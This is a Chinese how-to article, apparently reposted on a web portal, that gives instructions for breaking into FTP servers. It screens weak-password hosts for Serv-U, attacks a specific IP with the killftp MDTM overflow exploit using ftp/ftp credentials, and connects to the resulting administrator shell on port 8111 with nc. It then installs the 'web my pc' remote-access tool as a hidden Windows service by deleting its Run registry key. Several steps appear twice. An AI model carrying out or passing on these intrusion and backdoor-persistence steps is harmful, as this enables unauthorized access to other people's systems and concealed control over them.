扫描到FTP漏洞怎么入侵?

扫描到FTP漏洞怎么入侵?,第1张

虽然通过刚才的步骤得到了存在FTP弱口令的主机,但并不表明它们都可以被入侵.因为他们的FTP服务器类型还没确定.可能是微软的TP.或者是WUFTP等等.

而入侵时所利用的漏洞是serv-u

FTP的,

所以还必须对这些存在FTP弱口令的主机进行一下类型确认

步骤1

将刚才扫描生成的ftpscan.txt进行过滤.全部留下IP.以每个IP一行的规则保存.

步骤2

打开superscan扫描器.勾选"显示主机响应",IP设置里选择"导入文件",然后选择保存好的ftpscan.txt,最后将扫描端口定义在21上.完成之后就要吧开始扫描了

步骤3:很快扫描完毕.详细显示了被扫描主机的FTP服务器类型.可以看出有台目标主机的FTP服务器类型为:serv-u

FTP

二.

入侵指定目标.

通过刚才的扫描等一系列步骤.我已经确定了要下手的目标.

下面,开始使用serv-u

MDTM溢出漏洞进行入侵.

步骤1:在命令行下运行serv-u

MDTM溢出的利用程序killftp.察看到帮助文件

步骤2:按照提示.我们输入命令:killftp

218.109.2.222

21

ftp

ftp.

即对一台IP为218.109.2.222,帐号为FTP.密码为FTP的主机进行攻击,

可以看出,提示成功之后连接8111端口

步骤3:按照成功提示.我们利用NC端口程序连接目标主机的8111端口,输入连接命令:

nc

-vv

218.109.2.222

8111

很快就可以得到一个新的

DOS窗口.而且这个窗口还是管理员权限的.就这么简单

步骤1:在命令行下运行serv-u MDTM程序killftp.察看帮助文件,

步骤2:按照提示.输入命令:killftp 218.109.2.222 21 ftp ftp. 即对一台IP为218.109.2.222,帐号为FTP.密码为FTP的主机进行攻击,

步骤3:按照成功提示.利用NC端口程序连接目标主机的8111端口,输入连接命令: nc -vv 218.109.2.222 8111 很快就可以得到一个新的DOS窗口.而且这个窗口还是管理员权限的.

后门旋转

步骤1:打开web my pc的主程序进行设置.先填写登录名称和密码,

步骤2:接下来在web my pc的主程序中填写上登录名称,密码等相关信息,设置完毕.即可开始运行.在运行时屏幕右下角的任务栏会显示其图标.

步骤3:在右下角任务栏显示的图标上点鼠标右键,选择"安装为windows服务",这样就可以将web my pc安装为系统服务.

步骤4:点"开始","运行",输入regedit.打开注册表,进入路径为 HKEY_LOCAL_MACHINE\software\mirosoft\windows\currentversion\run 将webmypc的启动键值.webmypc删除掉即可.这样就不会在右下角任务栏显示出图标了。


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/52337.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-02-25
下一篇2023-02-25

发表评论

登录后才能评论

评论列表(0条)

    保存